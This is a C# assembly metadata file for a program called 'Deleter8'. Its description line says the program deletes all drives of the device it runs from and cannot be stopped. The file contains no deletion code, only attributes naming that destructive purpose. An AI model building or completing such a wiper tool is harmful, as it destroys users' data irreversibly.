[assembly: System.Reflection.AssemblyTitle(System.Deleter.Title)]
[assembly: System.Reflection.AssemblyProduct(System.Deleter.Title)]
[assembly: System.Reflection.AssemblyVersion(System.Deleter.Ver)]
[assembly: System.Reflection.AssemblyDescription("Deleter8, deletes all drives of the device the program is stored on, cannot be stopped.")]
[assembly: System.Reflection.AssemblyTrademark("")]
[assembly: System.Reflection.AssemblyCulture("")]
[assembly: System.Runtime.InteropServices.ComVisible(true)]
[assembly: System.Runtime.InteropServices.Guid("D4D92BCD-2092-411A-A244-2E0717E7F303")]
[assembly: System.Reflection.AssemblyFileVersion(System.Deleter.Ver)]
[assembly: System.Resources.NeutralResourcesLanguage("en")]